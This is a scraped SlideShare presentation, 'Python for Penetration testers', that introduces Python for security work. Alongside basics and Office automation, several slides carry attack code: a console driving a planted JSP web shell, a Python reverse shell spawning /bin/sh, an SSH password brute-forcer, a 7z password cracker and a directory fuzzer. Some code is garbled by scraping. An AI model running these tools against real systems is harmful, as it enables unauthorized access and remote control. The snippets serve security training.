Your SlideShare is downloading. ×
  • Like
Python for Penetration testers
Upcoming SlideShare
Loading in...5

Thanks for flagging this SlideShare!

Oops! An error has occurred.


Now you can save presentations on your phone or tablet

Available for both IPhone and Android

Text the download link to your phone

Standard text messaging rates apply

Python for Penetration testers


Quick presentation on how a penetration tester can start using Python to automate many of the task, create new tools, etc. For my colleagues..

Quick presentation on how a penetration tester can start using Python to automate many of the task, create new tools, etc. For my colleagues..

Published in Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads


Total Views
On SlideShare
From Embeds
Number of Embeds



Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

    No notes for slide


  • 1. Why?™  EASY (install, learn, code)™  Tons of libraries™  Code is easy to understand™  Multiplatform™  Good for prototyping
  • 2. History™  Conceived in late 80´s and first implementation in 1989™  Created by Guido Van Rossum™  Benevolent Dictator for Life™  Actually there are two branches 2.x and 3.0
  • 3. Python 101™  Interpreted language™  Object oriented™  Indentation is significant in Python, block delimiter.™  Usual control structures (if, while, etc)™  Multiple levels of organization (function, classes, modules, packages)
  • 4. Who is using Python?™  Core Impact ™  ImmunityDebugger™  Canvas ™  Peach™  W3AF ™  Sulley™  Sqlmap ™  Paimei™  Impacket ™  Scapy™  Google ™  Spike Proxy
  • 5. Python 101Data types: ™  Strings - “Hello” ™  Numbers - 123 ™  Lists – [‘hello’,’2’,’1’] ™  Tuples - (‘1’,’2’,’3’) (immutable) ™  Dictionaries – d = {‘key1’:’dog’,’key2’:’cat’}
  • 6. Python 101Structures:list=[1,2,3,4,5] if 3 > x: print “ 3 is bigger than” + x for x in list: else: print x print “ 3 is smaller than” + x
  • 7. Python 101Example Hello World: print “Hello World” With variables: msg=“Hello World” print msg
  • 8. Python 101™  Interactive python shell™  The commands execute line per line as you type™  Good for testing small pieces of code as loops, regex, etc™  Type “python” and enter to access the shell
  • 9. Python 101™  Strings starts counting in 0 and can have also negative indexes™  msg[0] is H™  msg[-1] is d
  • 10. Basic Code bitsimport sysofile = ”names.txt”fil = open(ofile,w’)x = fil.readlines()for y in x: print y
  • 11. Urllib2™  Library to deal with HTTP import urllib2 response = urllib2.urlopen( html = print html
  • 12. Basic fuzzerimport sys, urllib2 ofile = ”dirs.txt” fil = open(ofile,w) dirs = fil.readlines() for x in dirs: response = urllib2.urlopen(’+x) html =
  • 13. Encodingimport base64 string=“TEST” base64.standard_b64encode(string) VEVTVA== import hashlib’) m.update(string) res = m.hexdigest() print res 033bd94b1168d7e4f0d644c3c95e35bf
  • 14. Generic Console for Web Remote Executionimport httplib, urllib, sys host=”XXXXXXXXXX” while 1: cmd=raw_input("Exploited@"+host+"#>") if cmd=="exit": sys.exit() else: h = httplib.HTTP(host) cmd=urllib.quote(cmd) print cmd h.putrequest(GET,”/myconsole123/my-shell.jsp?pass=1231&cmd="+cmd) h.putheader(Host, host) h.putheader(User-agent, Internet Explorer 6.0 ) h.endheaders() returncode, returnmsg, headers = h.getreply()
  • 15. 7 Zip Crackerimport os, sys, pylzma from py7zlib import Archive7z, NoPasswordGivenError, WrongPasswordError pas = open(passwords.txt, rb) password=pas.readlines() for x in password: try: fp = open(test.7z, rb) archive = Archive7z(fp, password=x) print ”The password is" + x sys.exit() except Exception, e: fp.close()
  • 16. A Web browser#!/usr/bin/env python import sys from PyQt4.QtCore import * from PyQt4.QtGui import * from PyQt4.QtWebKit import * app = QApplication(sys.argv) web = QWebView() web.load(QUrl("")) sys.exit(app.exec_())
  • 17. One line Webserver™  python -m SimpleHTTPServer 8080
  • 18. SSH Bruteforcert = paramiko.Transport(hostname)try: t.start_client()except Exception: x=0try: t.auth_password(username=username,password=passw)except Exception: x=0if t.is_authenticated(): print “Password found “ + passw
  • 19. Proxy Strike Deflate Patch™  Pd contains the POST DATA in the repeat function: import zlib defla= zlib.compress(pd)
  • 20. Reverse Shellimport socket,subprocess,oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("",1234))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)["/bin/sh","-i"])
  • 21. Win32Com™  Library that allows us to access COM objects in Win32 systems™  We can automate Word, Excel, Powerpoint, access WMI, AD, etc
  • 22. Massive printingfrom win32com import clientimport timeword = client.Dispatch("Word.Application”)def printPDFDocument(filename): word.Documents.Open(filename) word.ActiveDocument.PrintOut() time.sleep(5) word.ActiveDocument.Close() word.Quit()printPDFDocument("c:test.doc")
  • 23. Excel Processingfrom win32com.client import Dispatch xlApp = Dispatch("Excel.Application") xlApp.Visible = 1"test.xls") for x in range(1,100): nombre=str(xlApp.ActiveSheet.Cells(x,5)) print nombre xlApp.Quit()
  • 24. WMIimport wmic = wmi.WMI ()for process in c.Win32_Process (): print process.ProcessId, process.Name
  • 25. Interesting stuff™™